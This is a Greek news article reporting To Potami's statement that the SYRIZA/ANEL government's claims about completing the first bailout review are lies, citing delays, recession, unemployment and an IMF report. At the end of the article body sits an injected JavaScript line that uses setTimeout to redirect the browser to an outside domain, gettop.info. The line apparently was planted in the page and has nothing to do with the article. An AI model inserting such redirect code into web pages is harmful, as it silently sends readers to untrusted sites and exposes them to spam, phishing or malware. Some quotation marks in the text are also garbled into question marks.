Ποτάμι: Ψέματα και λόγια του αέρα η ολοκλήρωση της πρώτης αξιολόγησης

0
9

 

Ψέματα και λόγια του αέρα καταλογίζει στην κυβέρνηση ΣΥΡΙΖΑ/ΑΝΕΛ το Ποτάμι, για την ολοκλήρωση της πρώτης αξιολόγησης του ελληνικού προγράμματος.

«Υποτίθεται ότι είχε ολοκληρωθεί σε πανηγυρικούς τόνους το καλοκαίρι. Με μικρή βέβαια καθυστέρηση από την ?ανάσταση της οικονομίας που θα ερχόταν, μαζί με αυτήν του Κυρίου, το Πάσχα.

Τέλη Σεπτέμβρη πλέον, ο υπουργός Οικονομικών παραδέχεται από το Λουξεμβούργο, ότι υπάρχουν ακόμη τρεις εκκρεμότητες για την καθυστερημένη υποδόση της δόσης. Η κλασική συνταγή των ΣΥΡΙΖΑΝΕΛ», αναφέρει ανακοίνωση του κόμματος και σχολιάζει δήλωση του κ. Τσακαλώτου ότι «ο στόχος της ελληνικής κυβέρνησης είναι να επιστρέψει η Ελλάδα στην ανάπτυξη, αλλά σε μια βιώσιμη ανάπτυξη».

«Εν τω μεταξύ όμως η οικονομία σέρνεται στην ύφεση και η χώρα χαρακτηρίζεται ?μη βιώσιμη? στην τελευταία έκθεση του Διεθνούς Νομισματικού Ταμείου. Η κοινωνία βρίσκεται αντιμέτωπη, καθημερινά, με νέα λουκέτα και ανεργία. Δυστυχώς η πολιτική αδράνεια και η τεχνοκρατική ανεπάρκεια που έχουν τη σφραγίδα των ΣΥΡΙΖΑΝΕΛ κρατάνε τη χώρα εγκλωβισμένη», σημειώνει το Ποτάμι. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here